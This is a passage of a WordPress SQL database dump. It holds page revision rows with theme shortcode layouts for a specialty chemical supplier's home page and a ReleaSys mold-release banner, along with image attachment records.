now</a>\r\n\r\n[/ux_banner]\r\n\r\n[/ux_banner]\r\n<h3></h3>\r\n<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re', '', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 18:53:09', '2016-08-18 18:53:09', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (511, 3, '2016-08-18 18:53:22', '2016-08-18 18:53:22', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="500px" bg="75" text_color="dark" animated="fadeIn" text_width="35%" text_align="center" text_pos="right center" text_bg="#FFF" parallax="0" parallax_text="0"]\r\n<h3 class="alt-font">Coming soon..</h3>\r\n___\r\n<h2 class="animated fadeInLeft uppercase">SUMMER / SPRING 2015 BREECHES</h2>\r\n___\r\n\r\n<a class="button alt-button" title="" href="#">Browse now</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner]', '', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 18:53:22', '2016-08-18 18:53:22', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (512, 3, '2016-08-18 18:54:48', '2016-08-18 18:54:48', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="500px" bg="75" text_color="dark" animated="fadeIn" text_width="35%" text_align="center" text_pos="far-right center" text_bg="#FFF" parallax="0" parallax_text="0"]\r\n<h3 class="alt-font">Coming soon..</h3>\r\n___\r\n<h2 class="animated fadeInLeft uppercase">SUMMER / SPRING 2015 BREECHES</h2>\r\n___\r\n\r\n<a class="button alt-button" title="" href="#">Browse now</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner]', '', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 18:54:48', '2016-08-18 18:54:48', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (513, 1, '2016-08-18 18:57:05', '2016-08-18 18:57:05', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n<p style="text-align: center;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="0" padding="5"]\r\n\r\n[button text="TECH SUPPORT" link="https://" size="large"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:57:05', '2016-08-18 18:57:05', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (514, 3, '2016-08-18 18:57:31', '2016-08-18 18:57:31', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="right center" parallax="0" parallax_text="0"]\r\n<h4 class="alt-font ">Beautiful User Experience</h4>\r\n<h1><strong>GO FLATSOME</strong></h1>\r\nDuis bibendum lorem non velit sodales sollicitudin. Vestibulum sed diam felis. Vivamus malesuada placerat pulvinar risus.\r\n\r\n<a class="button white" title="" href="#">LEARN MORE</a> <a class="button alt-button white" title="" href="#">BROWSE</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner]', '', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 18:57:31', '2016-08-18 18:57:31', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (515, 1, '2016-08-18 18:57:52', '2016-08-18 18:57:52', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n<p style="text-align: center;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="0" padding="50"]\r\n\r\n[button text="TECH SUPPORT" link="https://" size="normal"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:57:52', '2016-08-18 18:57:52', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (516, 1, '2016-08-18 18:58:33', '2016-08-18 18:58:33', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n<p style="text-align: center;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="0" padding="0"]\r\n\r\n[button text="TECH SUPPORT" link="https://" size="normal"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:58:33', '2016-08-18 18:58:33', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (517, 3, '2016-08-18 18:59:55', '2016-08-18 18:59:55', '', 'shutterstock_209155915', '', 'inherit', 'open', 'closed', '', 'shutterstock_209155915', '', '', '2016-08-18 18:59:55', '2016-08-18 18:59:55', '', 455, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_209155915.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (518, 3, '2016-08-18 19:00:09', '2016-08-18 19:00:09', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="517" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="right center" parallax="0" parallax_text="0"]\r\n<h4 class="alt-font ">Beautiful User Experience</h4>\r\n<h1><strong>GO FLATSOME</strong></h1>\r\nDuis bibendum lorem non velit sodales sollicitudin. Vestibulum sed diam felis. Vivamus malesuada placerat pulvinar risus.\r\n\r\n<a class="button white" title="" href="#">LEARN MORE</a> <a class="button alt-button white" title="" href="#">BROWSE</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner]', '', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 19:00:09', '2016-08-18 19:00:09', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (519, 1, '2016-08-18 19:02:30', '2016-08-18 19:02:30', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n<p style="text-align: right;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="left" padding="0"]\r\n&nbsp;<br/>\r\n[button text="TECH SUPPORT" link="https://" size="normal"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 19:02:30', '2016-08-18 19:02:30', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (520, 3, '2016-08-18 19:04:53', '2016-08-18 19:04:53', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="517" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="right center" parallax="0" parallax_text="0"]\r\n<h4 class="alt-font ">Semi-Permanent Mold Release</h4>\r\n<h1><strong>ReleaSys</strong></h1>\r\nCost-Effective, Efficient Release Systems which maximize productivity and decrease rejection rates.\r\n\r\n<a class="button alt-button white" title="" href="#">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner]', '', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 19:04:53', '2016-08-18 19:04:53', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (521, 3, '2016-08-18 19:06:29', '2016-08-18 19:06:29', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="517" text_color="dark" animated="fadeIn" text_width="45%" text_align="left" text_pos="right center" parallax="0" parallax_text="0"]\r\n<h4 class="alt-font ">Semi-Permanent Mold Release</h4>\r\n<h1><strong>ReleaSys</strong></h1>\r\nCost-Effective, Efficient Release Systems which maximize productivity and decrease rejection rates.\r\n\r\n<a class="button alt-button white" title="" href="#">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner]', '', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 19:06:29', '2016-08-18 19:06:29', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (522, 3, '2016-08-18 19:07:22', '2016-08-18 19:07:22', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="517" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="far-right center" parallax="0" parallax_text="0"]\r\n<h4 class="alt-font ">Semi-Permanent Mold Release</h4>\r\n<h1><strong>ReleaSys</strong></h1>\r\nCost-Effective, Efficient Release Systems which maximize productivity and decrease rejection rates.\r\n\r\n<a class="button alt-button white" title="" href="#">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner]', '', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 19:07:22', '2016-08-18 19:07:22', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (523, 3, '2016-08-18 19:11:19', '2016-08-18 19:11:19', '', 'ReleaSys Boat hulls', '', 'inherit', 'open', 'closed', '', 'releasys-boat-hulls', '', '', '2016-08-18 19:11:19', '2016-08-18 19:11:19', '', 455, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/ReleaSys-Boat-hulls.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (524, 3, '2016-08-18 19:11:30', '2016-08-18 19:11:30', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="523" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="far-right center" parallax="0" parallax_text="0"]\r\n<h4 class="alt-font ">Semi-Permanent Mold Release</h4>\r\n<h1><strong>ReleaSys</strong></h1>\r\nCost-Effective, Efficient Release Systems which maximize productivity and decrease rejection rates.\r\n\r\n<a class="button alt-button white" title="" href="#">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner]', '', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 19:11:30', '2016-08-18 19:11:30', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (525, 3, '2016-08-18 19:14:03', '2016-08-18 19:14:03', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="523" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="far-right center" parallax="0" parallax_text="0"]\r\n<h4 class="alt-font "><strong>Semi-Permanent Mold Release</strong></h4>\r\n<h1>ReleaSys</h1>\r\nMiller-Stephenson Exclusive Product\r\n\r\n<a class="button alt-button white" title="" href="#">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner]', '', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 19:14:03', '2016-08-18 19:14:03', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
